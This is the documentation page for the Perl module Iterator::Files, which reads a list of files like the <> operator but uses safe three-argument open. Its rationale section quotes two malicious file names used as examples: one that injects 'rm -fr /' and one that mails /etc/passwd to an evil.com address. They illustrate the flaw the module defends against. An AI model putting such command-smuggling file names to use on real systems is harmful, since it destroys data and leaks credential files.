The Perl Toolchain Summit needs more sponsors. If your company depends on Perl, please support this very important event.

NAME

Iterator::Files - Iterate through the contents of a list of files

SYNOPSIS

    use Iterator::Files;

    $input = Iterator::Files->new( files => [ "foo", "bar" ] );
    while ( <$input> ) {
        ...
        warn("current file = ", $it->current_file, "\n");
    }

    # Alternatively:
    while ( $input->has_next ) {
        $line = $input->next;
        ...
    }

DESCRIPTION

Iterator::Files can be used to retrieve the contents of a series of files as if it were one big file, in the style of the <> (Diamond) operator.

Just like <> it returns the records of all files, one by one, as if it were one big happy file. In-place editing of files is also supported..

As opposed to the built-in <> operator, no magic is applied to the file names unless explicitly requested. This means that you're protected from file names that may wreak havoc to your system when processed through the magic of the two-argument open() that Perl normally uses for <>.

Iterator::Files is part of the Iterator-Diamond package.

RATIONALE

Perl has two forms of open(), one with 2 arguments and one with 3 (or more) arguments.

The 2-argument open is magical. It opens a file for reading or writing according to a leading '<' or '>', strips leading and trailing whitespace, starts programs and reads their output, or writes to their input. A filename '-' is taken to be the standard input or output of the program, depending on whether the file is opened for reading or writing.

The 3-argument open is strict. The second argument designates the way the file should be opened, and the third argument contains the file name, taken literally.

Many programs read a series of files whose names are passed as command line argument. The diamond operator makes this very easy:

  while ( <> ) {
    ....
  }

The program can then be run as something like

  myprog *.txt

Internally, Perl uses the 2-argument open for this.

What's wrong with that?

Well, this goes horribly wrong if you have file names that trigger the magic of Perl's 2-argument open.

For example, if you have a file named ' foo.txt' (note the leading space), running

  myprog *.txt

will surprise you with the error message

  Can't open  foo.txt: No such file or directory

This is still reasonably harmless. But what if you have a file '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're lucky, that is. It can also silently wipe out valuable data.

When your system administrator runs scripts like this, malicous file names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can be a severe threat to your system.

After a long discussion on the perl mailing list it was felt that this security hole should be fixed. Iterator::Files does this by providing a decent iterator that behaves just like <>, but with safe semantics.

FUNCTIONS

new

Constructor. Creates a new iterator.

The iterator can be used by calling its methods, but it can also be used as argument to the readline operator. See the examples in SYNOPSIS.

new takes an optional series of key/value pairs to control the exact way the iterator must behave.

magic => { none | stdin | all }

none applies three-argument open semantics to all file names and do not use any magic. This is the default behaviour.

stdin is also safe. It applies three-argument open semantics but allows a file name consisting of a single dash - to mean the standard input of the program. This is often very convenient.

all applies two-argument open semantics. This makes the iteration unsafe again, just like the built-in <> operator.

edit => suffix

Enables in-place editing of files, just as the built-in <> operator.

Unlike the built-in operator semantics, an empty suffix to discard backup files is not supported.

files => aref

Use this list of files. If this is not specified, uses @ARGV.

next

Method, no arguments.

Returns the next record of the input stream, or undef if the stream is exhausted.

has_next

Method, no arguments.

Returns true if the stream is not exhausted. A subsequent call to next will return a defined value.

This is the equivalent of the 'eof()' function.

is_eof

Method, no arguments.

Returns true if the current file is exhausted. A subsequent call to next will open the next file if available and start reading it.

This is the equivalent of the 'eof' function.

current_file

Method, no arguments.

Returns the name of the current file being processed.

LIMITATIONS

Even in list context, the iterator <$input> is currently called only once and with scalar context. This will not work as expected:

  my @lines = <$input>;

This reads all remaining lines:

  my @lines = $input->readline;

SEE ALSO

Iterator::Diamond, open() in perlfun, perlopentut.

AUTHOR

Johan Vromans, <jv at cpan.org>

BUGS

Please report any bugs or feature requests to bug-iterator-diamond at rt.cpan.org, or through the web interface at http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Iterator-Diamond. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.

SUPPORT

You can find documentation for this module with the perldoc command.

    perldoc Iterator::Files

You can also look for information at:

ACKNOWLEDGEMENTS

This package was inspired by a most interesting discussion of the perl5-porters mailing list, July 2008, on the topic of the unsafeness of two-argument open() and its use in the <> operator.

COPYRIGHT & LICENSE

Copyright 2016,2008 Johan Vromans, all rights reserved.

This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.